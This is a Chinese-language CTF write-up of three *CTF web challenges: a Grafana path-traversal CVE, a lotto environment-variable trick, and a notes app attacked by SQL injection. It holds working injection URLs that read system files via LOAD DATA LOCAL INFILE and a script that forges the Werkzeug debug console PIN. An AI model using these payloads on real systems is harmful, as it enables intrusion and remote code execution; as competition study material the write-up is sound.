【*CTF web部分writeup】

1NDEX

• oh-my-grafana
• oh-my-lotto
• oh-my-notepro

oh-my-grafana

CVE-2021-43798
读到这些文件

一开始想的用脚本解密db文件里加过密的密码，但发现datasource是空的….
回头过一下配置文件
过到一个明文密码

本来以为要在哪里getshell,
翻插件翻到mysql

试了一下默认的

成功添加数据源

更换数据源后 有个edit sql直接查询

oh-my-lotto

大致意思就是上传forecast猜 最后和lotto_result结果对比
审计到这很可疑的环境变量赋值并且有safe_check

os.system从lotto容器下载生成的随机数文件
一开始想的直接改环境变量PATH使wget无法执行
Lotto_result=’result’
然后传个forecast 但是后来发现以 rb形式读取文件返回结果不可能与字符串相等

改变思路 第一次先随便传key value 让靶机生成lotto_result文件，然后在改环境变量，将返回的result随机数代入到自己微调的脚本
直接嫖靶机的环境生成了…

from flask import Flask, make_response
import secrets

app = Flask(__name__)

@app.route("/")
def index():
    lotto = [35,39,4,10,26,34,15,25,5,6,6,31,32,36,8,29,35,17,35]
    lotto1=[]
    for i in range(0, 19):
        lotto1.append(str(lotto[i]))
        
    
    r = '\n'.join(lotto1)
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
    return response

if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=80)

下载文件再传上去
Key: path
Value: /tmp

d出flag

oh-my-notepro

弱口令进了a a
Creat view
试了一下有注入点

联合查询成功

翻了半天的表好像都没啥东西
http://123.60.72.85:5002/view?note_id=1’%20union%20select%201%2C2%2C3%2C4%2Cgroup_concat(table_name)%20from%20information_schema.tables%23

然后看到别人创建的note里可以看到文件了
就想着应该可以读文件

sql注入文件读写 - cAr7n - 博客园 (cnblogs.com)

https://www.cnblogs.com/car7n/p/14848218.html

如法炮制

/console有调试口
从报错信息可见python3.8 flask
计算pin码debug

http://124.70.185.87:5002/view?note_id=1%27;CREATE%20TABLE%20kidult(data%20text);%23

http://124.70.185.87:5002/view?note_id=1%27;load%20data%20LOCAL%20infile%20%20%27/sys/class/net/eth0/address%27%20into%20table%20kidult%23
http://124.70.185.87:5002/view?note_id=1%27;load%20data%20LOCAL%20infile%20%20%27/etc/machine-id%27%20into%20table%20kidult%23
http://124.70.185.87:5002/view?note_id=1%27;load%20data%20LOCAL%20infile%20%20%27/proc/self/cgroup%27%20into%20table%20kidult%23


http://124.70.185.87:5002/view?note_id=123%27%20union%20select%201,2,3,4,group_concat(data)%20from%20kidult%20%20%20--+

很奇怪的是这里居然是拼接
/etc/machine-id + /proc/self/cgroup
而不是/proc/sys/kernel/random/boot_id 和/proc/self/cgroup
回头去翻一下flask pin码生成的源码

依次读取 /etc/machine-id 和 /proc/sys/kernel/random/boot_id
读到值即break(确实理解不到位

Pin码生成脚本

#sha1
import hashlib
from itertools import chain
mac=input('mac>>>')
mac = "0x"+mac.replace(":","")
mac = str(int(mac,16))
cgroup=input('cgroup>>>')

probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    mac,#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '1cc402dd0e11d5ae18db04a6de87223d'+cgroup#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

但试到后面console pin码对了.还是用不了…

oh-my-lotto-revenge
才疏学浅一定复现